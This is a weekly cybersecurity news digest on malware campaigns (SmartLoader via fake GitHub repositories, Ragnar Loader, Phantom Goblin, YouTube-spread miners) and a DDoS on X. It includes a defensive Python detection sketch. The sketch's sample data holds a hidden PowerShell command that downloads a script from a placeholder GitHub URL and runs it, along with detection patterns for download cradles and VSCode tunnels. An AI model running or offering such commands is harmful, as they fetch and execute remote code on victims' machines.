Weekly Summary Cyberattacks March 06-12
12 March 2025

Cybercriminals use fake repositories on GitHub to distribute malware

A malicious campaign is using fake repositories on GitHub to distribute SmartLoader, which in turn installs Lumma Stealer. Attackers leverage GitHub's trusted reputation and generate content with artificial intelligence to make the repositories appear legitimate, disguising them as tools, cracked software or video game cheats. Victims download ZIP files containing obfuscated scripts, which execute malicious code when extracted. If the attack is successful, cybercriminals can steal credentials, cryptocurrency wallets, personal information and two-factor authentication data, facilitating financial fraud and identity theft. This strategy represents an evolution of previous tactics, moving from the use of GitHub attachments to the creation of complete repositories with AI-generated documentation.

X suffers a massive cyberattack claimed by Dark Storm

The social network X (formerly Twitter) suffered a massive cyberattack on Monday that caused service failures globally. Elon Musk, owner of the platform, confirmed the incident and stated that it was an attack with extensive resources, possibly carried out by an organized group or a state. The pro-Palestinian hacktivist collective Dark Storm claimed credit for the offensive through messages on its Telegram channel, where it shared evidence of the distributed denial-of-service (DDoS) attack. This attack adds to a series of recent offensives by hacktivist groups against major technology platforms.

Cybercriminals use Ragnar Loader to carry out cyberattacks

Cybersecurity researchers have identified Ragnar Loader, a sophisticated malware used by groups such as FIN7, FIN8 and Ragnar Locker to maintain access to compromised systems and execute ransomware attacks. The malware is modular and evolves constantly to evade detection. Although it is associated with Ragnar Locker, it is unclear whether that group develops it or rents it to third parties. First documented in 2021, it has been in use since 2020 and has played a key role in recent attacks, including the distribution of BlackCat ransomware. Ragnar Loader employs PowerShell, advanced encryption and process injection techniques to operate covertly, allowing remote control of the infected system. The malware is distributed in packages together with tools for privilege escalation and remote access, facilitating propagation within corporate networks. In addition, it includes a Linux component that enables remote connections, similar to techniques used by other threats such as QakBot.

“Phantom Goblin” malware alert: credential theft and unauthorized remote access

Cybersecurity researchers have identified a new malware operation dubbed “Phantom Goblin,” which employs social engineering tactics to distribute malware designed to steal credentials and maintain remote access to compromised systems. The attack begins with the distribution of compressed RAR archives containing shortcut files (LNKs) disguised as legitimate documents. Executing these files triggers a PowerShell script that downloads malicious payloads from a repository on GitHub. The malware extracts browser cookies, login credentials and browsing history, using advanced techniques to evade detection. It also abuses the Visual Studio Code (VSCode) tunneling feature to establish remote access without raising suspicion. All stolen information is archived and sent covertly to a Telegram bot controlled by the attackers. Experts recommend not opening suspicious files, restricting the use of PowerShell and monitoring unusual activity on networks and in applications to mitigate the impact of this threat.
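As an added illustration for defenders (not part of the original summary and not any vendor's detection logic), the following Python sketch checks constructed process-creation events for two observable steps of the chain described above: PowerShell launched from Explorer with hidden/bypass flags and a GitHub download cradle, and a VSCode tunnel started from a scripting host. The event layout, the repository URL and the command lines are all assumptions built for the example.

```python
import re

# Constructed sample process-creation events (not real telemetry).
# Each tuple: (parent image, image, command line). The GitHub path is a placeholder.
SAMPLE_EVENTS = [
    ("explorer.exe", "cmd.exe", "cmd.exe /c start winword.exe Invoice_2025.docx"),
    ("explorer.exe", "powershell.exe",
     "powershell.exe -w hidden -ep bypass -c iwr https://raw.githubusercontent.com/EXAMPLE/repo/main/a.ps1 | iex"),
    ("powershell.exe", "code.exe", "code.exe tunnel --accept-server-license-terms --name host-01"),
    ("svchost.exe", "powershell.exe", "powershell.exe -File C:\\Scripts\\backup.ps1"),
    ("explorer.exe", "powershell.exe", "powershell.exe -c Get-ChildItem"),
]

# Flags commonly seen when a shortcut launches a script that should not show a window.
SUSPICIOUS_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy)?p?\s+bypass|-enc|-e\s+[A-Za-z0-9+/=]{20,})", re.I)
# A download cradle: a fetch verb followed somewhere later by an http(s) URL.
DOWNLOAD_CRADLE = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b.*https?://", re.I)
GITHUB_HOST = re.compile(r"https?://(raw\.)?github(usercontent)?\.com/", re.I)
VSCODE_TUNNEL = re.compile(r"\bcode(\.exe)?\s+tunnel\b", re.I)


def classify(parent, image, cmdline):
    """Return the list of detection tags that apply to one process-creation event."""
    tags = []
    img = image.lower()
    if img == "powershell.exe" and parent.lower() == "explorer.exe":
        # PowerShell as a direct child of Explorer usually means the user opened a file (e.g. an LNK).
        if SUSPICIOUS_FLAGS.search(cmdline):
            tags.append("powershell_hidden_or_bypass_from_explorer")
        if DOWNLOAD_CRADLE.search(cmdline) and GITHUB_HOST.search(cmdline):
            tags.append("powershell_github_download_cradle")
    if img == "code.exe" and VSCODE_TUNNEL.search(cmdline):
        # Tunnels are a legitimate feature; a tunnel spawned by a script host is the unusual part.
        tags.append("vscode_tunnel_started")
        if parent.lower() in ("powershell.exe", "cmd.exe", "wscript.exe"):
            tags.append("vscode_tunnel_from_script_host")
    return tags


def scan(events):
    """Return (index, tags) for every event that produced at least one tag."""
    return [(i, tags) for i, (p, img, cmd) in enumerate(events) if (tags := classify(p, img, cmd))]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, hits)
```

A routine backup script (event 3) and an interactive PowerShell session (event 4) produce no tags, which is the point of keying on the parent process and command-line flags together rather than on PowerShell alone.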

Cybercriminals use YouTube to distribute malware disguised as a circumvention tool

A malware campaign has been detected that uses YouTube to lure users with purported software for bypassing network restrictions. Attackers take legitimate network traffic modification tools and insert malicious code into them, including cryptocurrency miners and remote access Trojans. One of the most notorious cases involves a YouTuber with 60,000 subscribers who shared links to infected files in the descriptions of his videos. After the videos reached over 400,000 views, the descriptions were edited to hide the activity. In addition, the attackers used blackmail tactics, threatening content creators with false copyright reports to force them to spread the malicious files. The distributed malware, an XMRig-based miner, hides in the system and manipulates processes to avoid detection. It only infects devices with Russian IP addresses and inflates its file size to evade automated scans.